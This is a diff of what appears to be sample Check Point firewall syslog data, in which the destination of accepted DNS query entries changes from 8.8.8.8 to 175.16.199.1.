+<134>1 2020-03-29T16:51:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d217,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44548"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d217,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50096"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d217,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500695"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48563"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d217,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500695"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52162"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:51:36Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d218,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500696"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54224"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:51:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500698"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45072"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:51:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d21a,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
@@ -1401,16 +1401,16 @@
 <134>1 2020-03-29T16:51:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500700"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56320"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:51:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500700"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40593"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:51:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21c,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500700"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56113"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:41Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500701"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33196"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:42Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21e,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500702"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52255"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:42Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21e,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500702"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37963"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:41Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500701"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33196"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:42Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21e,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500702"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52255"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:42Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21e,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500702"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37963"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:51:46Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d222,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48707"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:46Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d222,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45589"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:46Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d222,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57374"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:46Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d222,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45589"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:46Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d222,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57374"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:51:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d223,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33020"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:51:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d223,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36430"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:48Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d224,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500708"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39151"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d224,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500708"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56270"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:48Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d224,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500708"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39151"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d224,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500708"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56270"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:51:51Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d227,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500711"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48406"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:51:51Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d227,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500711"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41335"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:51:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d228,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50038"; service:"443"; service_id:"https"; src:"192.168.1.117"]
@@ -1418,30 +1418,30 @@
